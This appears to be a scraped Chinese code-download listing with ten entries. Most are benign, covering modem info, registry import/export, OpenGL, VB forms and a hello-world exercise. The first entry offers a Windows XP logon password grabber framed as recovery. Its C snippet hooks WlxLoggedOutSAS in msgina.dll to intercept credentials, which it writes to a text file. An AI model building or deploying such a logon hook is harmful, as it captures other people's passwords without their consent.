-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
ModemInfo.rar, access to Modem Information Visual C++ class, welcome to download...
ModemInfo.rar,获取Modem信息的Visual C++类,欢迎下载!-ModemInfo.rar, access to Modem Information Visual C++ class, welcome to download!
- 2022-03-19 03:45:03下载
- 积分:1
-
a very good intereger
flex皮肤,非常good,适合flex开发者-a very good intereger
- 2022-02-21 14:27:15下载
- 积分:1
-
实现注册表项的导入与导出
实现注册表项的导入与导出-achieve registry import and export
- 2022-10-26 12:55:03下载
- 积分:1
-
系统管理器
系统管理器-System Manager
- 2022-01-24 18:37:07下载
- 积分:1
-
从开源网站上下载的代码,在vc中调用opengl,打开wir文件,能光滑曲面,挺不错的!...
从开源网站上下载的代码,在vc中调用opengl,打开wir文件,能光滑曲面,挺不错的!-From the open-source Web site to download the code, in vc call opengl, open wir document that smooth surface, very good!
- 2022-02-27 03:48:20下载
- 积分:1
-
印出大家好的c++練習
這是印出大家好的c++練習!這是印出大家好的c++練習!
這是印出大家好的c++練習!這是印出大家好的c++練習!
- 2023-02-12 00:00:04下载
- 积分:1
-
使用Java虚拟机
使用Java虚拟机-The example of using Java Virtul Machine
- 2022-07-01 14:42:49下载
- 积分:1
-
Measures Overhead in Breaking A Deadlock
Measures Overhead in Breaking A Deadlock
- 2022-02-07 08:33:38下载
- 积分:1
-
在VB中两个窗体如何来调用!!!这里提供了一个方法
在VB中两个窗体如何来调用!!!这里提供了一个方法-in VB two forms how to call! ! ! It provides a method!
- 2022-03-12 06:22:28下载
- 积分:1